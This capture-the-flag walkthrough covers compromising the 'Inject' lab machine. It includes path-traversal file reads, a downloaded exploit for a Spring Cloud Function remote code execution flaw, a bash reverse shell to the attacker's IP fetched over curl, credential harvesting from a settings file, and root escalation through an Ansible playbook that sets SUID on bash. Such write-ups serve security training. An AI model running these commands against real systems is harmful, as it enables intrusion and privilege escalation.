Explore the fundamentals of cybersecurity in the Inject Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
1
| 10.10.11.204 inject.htb
|
Script to add hosts automatically
1
2
3
| ip="10.10.11.204"
domain="inject.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
|
Mapping
1
2
3
4
5
6
7
8
9
10
11
12
| Nmap scan report for inject.htb (10.10.11.204)
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ca:f1:0c:51:5a:59:62:77:f0:a8:0c:5c:7c:8d:da:f8 (RSA)
| 256 d5:1c:81:c9:7b:07:6b:1c:c1:b4:29:25:4b:52:21:9f (ECDSA)
|_ 256 db:1d:8c:eb:94:72:b0:d3:ed:44:b9:6c:93:a7:f9:1d (ED25519)
8080/tcp open nagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
http://10.10.11.204:8080/
http://10.10.11.204:8080/upload
Lfi
1
2
| curl -s 'http://10.10.11.204:8080/show_image?img=../../../../../../etc/passwd' | grep sh$
curl -s 'http://10.10.11.204:8080/show_image?img=pwn' | jq
|
Output
1
2
3
4
5
6
7
| {
"timestamp": "2024-12-05T05:22:30.253+00:00",
"status": 500,
"error": "Internal Server Error",
"message": "URL [file:/var/www/WebApp/src/main/uploads/pwn] cannot be resolved in the file system for checking its content length",
"path": "/show_image"
}
|
1
| curl -s 'http://10.10.11.204:8080/show_image?img=../../../pom.xml'
|
Realpath:
1
2
| curl -s 'http://10.10.11.204:8080/show_image?img=../../../../../../../../../var/www/WebApp/pom.xml' > pom.xml
snyk test --file=pom.xml
|
CVE-2022-22963
Output
1
2
| ✗ Remote Code Execution [Critical Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKCLOUD-2436645] in org.springframework.cloud:spring-cloud-function-context@3.2.2
introduced by org.springframework.cloud:spring-cloud-function-web@3.2.2 > org.springframework.cloud:spring-cloud-function-context@3.2.2
|
https://www.exploit-db.com/exploits/51577
1
2
3
4
| wget https://www.exploit-db.com/raw/51577 -O poc
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo -e '/bin/bash -i >& /dev/tcp/'$vpnip'/9001 0>&1' > rev.sh
python -m http.server
|
Listener
1
2
| python poc --url 'http://10.10.11.204:8080/functionRouter' --command 'curl http://10.10.14.18:8000/rev.sh -o /tmp/rev.sh'
python poc --url 'http://10.10.11.204:8080/functionRouter' --command 'bash /tmp/rev.sh'
|
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
1
| python3 -c 'import pty;pty.spawn("/bin/bash")'
|
Press Ctrl+Z to background the shell, then run:
1
| stty size; stty raw -echo; fg
|
As the last step, set the terminal environment:
1
2
3
| cat /home/frank/.m2/settings.xml
su phil
cat /home/phil/user.txt
|
Although I rarely mention using pspy on Linux, it’s essential to deploy it regularly—similar to linpeas on Linux or BloodHound on Windows—particularly when you’re stuck.
1
2
3
| curl -s http://10.10.14.18:8000/pspy64 -o ps
chmod +x ps
./ps
|
After execution, we observe numerous Ansible scripts in the output.
1
2
| /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
/usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
|
Create an Ansible playbook designed to be executed with root privileges.
1
2
3
| cd /opt/automation/tasks/
cat playbook_1.yml
nano shell.yml
|
1
2
3
4
5
| - hosts: localhost
tasks:
- name: Set SUID bit on /bin/bash
ansible.builtin.shell:
cmd: "/usr/bin/chmod +s /bin/bash"
|
Now, we just wait.
1
| watch -n 1 'ls -la /bin/bash'
|
-rwxr-xr-x 1 root root 1183448 Apr 18 2022 /bin/bash
Now, we just wait for the SUID changes to take effect.
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
1
2
| bash -p
cat /root/root.txt
|